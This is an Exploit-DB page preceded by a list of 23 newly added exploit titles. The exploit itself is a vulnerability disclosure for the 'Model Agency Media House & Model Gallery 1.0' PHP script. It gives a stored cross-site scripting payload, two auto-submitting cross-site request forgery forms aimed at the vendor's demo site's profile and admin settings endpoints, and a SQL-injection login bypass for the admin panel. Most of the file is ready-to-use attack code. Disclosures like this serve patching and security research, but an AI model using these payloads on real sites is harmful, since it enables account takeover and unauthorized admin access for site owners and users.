08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
56 lines
No EOL
1.9 KiB
Text
56 lines
No EOL
1.9 KiB
Text
# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass
|
|
# Date: 2018-05-21
|
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
|
# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29
|
|
# Version: 1.0
|
|
# Tested on: Kali linux
|
|
|
|
# Description:
|
|
#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities :
|
|
|
|
# POC 1 : Persistent cross site scripting :
|
|
1) After creating an account , go to your profile.
|
|
2) Navigate to "Update profile" and put this payload :
|
|
"/><script>alert(document.domain)</script>
|
|
3) You will have an alert box in the page .
|
|
|
|
# POC 2 : CSRF : cross site request forgery :
|
|
|
|
# User's CSRF exploit :
|
|
<html>
|
|
<head>
|
|
<title>CSRF POC</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://model.thesoftking.com/updateprofile"
|
|
method="post">
|
|
<input type="hidden" name="name" value="anything">
|
|
<input type="hidden" name="mobile" value="200000">
|
|
<input type="hidden" name="address" value="anything">
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
# Admin page CSRF exploit :
|
|
|
|
<form action="http://model.thesoftking.com/admin/setgeneral.php"
|
|
method="post">
|
|
<input name="name" value="test" type="hidden">
|
|
<input name="wcmsg" value="test" type="hidden">
|
|
<input name="address" value="test2" type="hidden">
|
|
<input name="mobile" value="1000000" type="hidden">
|
|
<input name="email" value="test@test.com" type="hidden">
|
|
<input name="currency" value="decode" type="hidden">
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
|
|
# POC 3 : Authentication bypass :
|
|
# Attacker can bypass admin panel without any authentication :
|
|
Path : /admin
|
|
Username : ' or 0=0 #
|
|
Password : anything |